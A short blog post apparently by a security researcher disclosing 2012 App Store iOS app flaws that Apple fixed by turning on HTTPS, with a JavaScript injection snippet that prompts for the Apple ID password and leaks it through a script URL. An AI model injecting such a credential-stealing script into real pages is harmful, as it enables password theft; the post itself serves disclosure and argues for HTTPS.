Early July 2012, I reported to Apple numerous vulnerabilities related to their App Store iOS app. Early March Apple finally issued a fix for it and turned on HTTPS for the App Store. I am really happy that my spare-time work pushed Apple to finally enabled HTTPS to protect users. This post discuss the vulnerabilities I found.
Attacks included Password stealing, App swapping, App fake upgrade, Preventing application installation, and Privacy leak — All made possible by simply intercepting and manipulating the HTML that’s being used by the App Store app.
<script>
password = prompt("Apple ID Password","");
var s = document.createElement('script');
s.type = "text/javascript";
s.src = "fakepassword=" + password;
var script = document.createTextNode(s);
document.getElementsByTagName('head')[0].appendChild(s);
</script>
May this be a lesson for all those offering services out there to enable SSL and route all traffic over HTTPS.
Apple finally turns HTTPS on for the App Store, fixing a lot of vulnerabilities →